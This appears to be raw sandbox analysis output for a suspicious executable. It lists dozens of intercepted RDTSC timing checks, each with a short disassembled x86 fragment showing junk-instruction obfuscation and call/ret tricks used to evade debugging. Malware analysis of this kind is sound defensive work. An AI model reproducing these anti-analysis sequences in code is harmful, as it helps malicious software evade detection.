Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9C5 second address: 70D9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9D7 second address: 70D9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007F60A4BE8BF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9F2 second address: 70D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71026C second address: 710270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 710270 second address: 710280 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 710280 second address: 71029E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F60A4BE8BDAh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71029E second address: 7102A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71338B second address: 71338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71338F second address: 713398 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713670 second address: 713674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713674 second address: 713692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F60A4E98F06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7137E7 second address: 7137F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4BE8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7137F4 second address: 713818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98EFCh 0x00000009 jmp 00007F60A4E98F04h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715C0A second address: 715C29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007F60A4BE8BD6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715C29 second address: 715C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7167C3 second address: 7167C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716C0A second address: 716C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716D21 second address: 716D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+124442E7h], ecx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jno 00007F60A4BE8BD6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7172E5 second address: 7172EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7172EE second address: 717370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F60A4BE8BD8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push edi 0x00000028 mov dword ptr [ebp+122D37C5h], edx 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 mov si, B61Ch 0x00000035 pushad 0x00000036 add ebx, dword ptr [ebp+122D2E12h] 0x0000003c mov si, 7E3Dh 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F60A4BE8BD8h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d sbb esi, 1A7B6F7Ch 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7199E4 second address: 7199EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A33C second address: 71A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F60A4BE8BD8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F60A4BE8BE8h 0x00000028 pushad 0x00000029 jmp 00007F60A4BE8BE5h 0x0000002e cmc 0x0000002f popad 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F60A4BE8BD8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c sub esi, dword ptr [ebp+1244987Eh] 0x00000052 push 00000000h 0x00000054 mov edi, 188BE292h 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F60A4BE8BDCh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3DC second address: 71A3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3E2 second address: 71A3E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3E8 second address: 71A3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AEFB second address: 71AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71ABF0 second address: 71ABF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B712 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B716 second address: 71B73C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F07h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71FB86 second address: 71FBAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d ja 00007F60A4BE8BD6h 0x00000013 je 00007F60A4BE8BD6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72230E second address: 722314 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7232A6 second address: 7232C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72428A second address: 72428E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71ED8A second address: 71EE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F60A4BE8BE7h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push ecx 0x0000000f jmp 00007F60A4BE8BE8h 0x00000014 pop edi 0x00000015 mov ebx, dword ptr [ebp+122D2D66h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jnl 00007F60A4BE8BD9h 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F60A4BE8BD8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push eax 0x0000004a mov ebx, dword ptr [ebp+122D31ACh] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0935h] 0x00000057 push FFFFFFFFh 0x00000059 jmp 00007F60A4BE8BDDh 0x0000005e nop 0x0000005f push ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72428E second address: 7242F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F60A4E98EF8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 add bx, 148Eh 0x0000002c push 00000000h 0x0000002e mov edi, ecx 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D31A7h], ebx 0x00000039 adc dx, 72FAh 0x0000003e popad 0x0000003f xor dword ptr [ebp+1244FE43h], eax 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jno 00007F60A4E98EF6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723470 second address: 723474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71EE28 second address: 71EE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7242F4 second address: 724302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F60A4BE8BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723474 second address: 72347A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72347A second address: 723480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723480 second address: 723484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723484 second address: 7234A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F60A4BE8BE7h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72525A second address: 7252C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx ebx, si 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F60A4E98EF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c adc ebx, 65A75ED4h 0x00000032 push 00000000h 0x00000034 and bx, D490h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F60A4E98F09h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72443E second address: 724442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724442 second address: 724446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727398 second address: 7273FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F60A4BE8BD8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F60A4BE8BD8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push eax 0x00000046 pushad 0x00000047 push edi 0x00000048 jp 00007F60A4BE8BD6h 0x0000004e pop edi 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284E7 second address: 7284EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284EB second address: 7284FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b js 00007F60A4BE8BD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284FE second address: 728503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72960D second address: 729616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 729616 second address: 729666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4E98EF6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F60A4E98EF8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov di, ax 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D2C82h] 0x00000036 jne 00007F60A4E98EFCh 0x0000003c push eax 0x0000003d push ecx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5AE second address: 72A5C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5C8 second address: 72A5EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F60A4E98F05h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F60A4E98F00h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5EE second address: 72A63F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F60A4BE8BDCh 0x0000000c push 00000000h 0x0000000e jbe 00007F60A4BE8BDAh 0x00000014 mov bx, 1AB2h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F60A4BE8BD8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F60A4BE8BDCh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A63F second address: 72A65E instructions: 0x00000000 rdtsc 0x00000002 je 00007F60A4E98EFCh 0x00000008 jne 00007F60A4E98EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F60A4E98EFCh 0x00000019 jo 00007F60A4E98EF6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B5E7 second address: 72B5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 729838 second address: 72983C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72983C second address: 729842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A7BF second address: 72A7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A884 second address: 72A88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D533 second address: 72D538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728724 second address: 728728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728728 second address: 72872E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B7A6 second address: 72B7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B858 second address: 72B874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60A4E98F03h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B874 second address: 72B879 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E6F1 second address: 72E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F762 second address: 72F776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F60A4BE8BD6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F776 second address: 72F783 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F859 second address: 72F85E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737D9E second address: 737DA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D67A2 second address: 6D67C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F60A4BE8BD6h 0x0000000f jnl 00007F60A4BE8BD6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007F60A4BE8BE2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D67C4 second address: 6D67D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4E98EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7374F5 second address: 737501 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737669 second address: 73766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73792C second address: 737930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737930 second address: 737945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F60A4E98EFBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C17B second address: 73C181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C181 second address: 73C192 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C192 second address: 73C196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
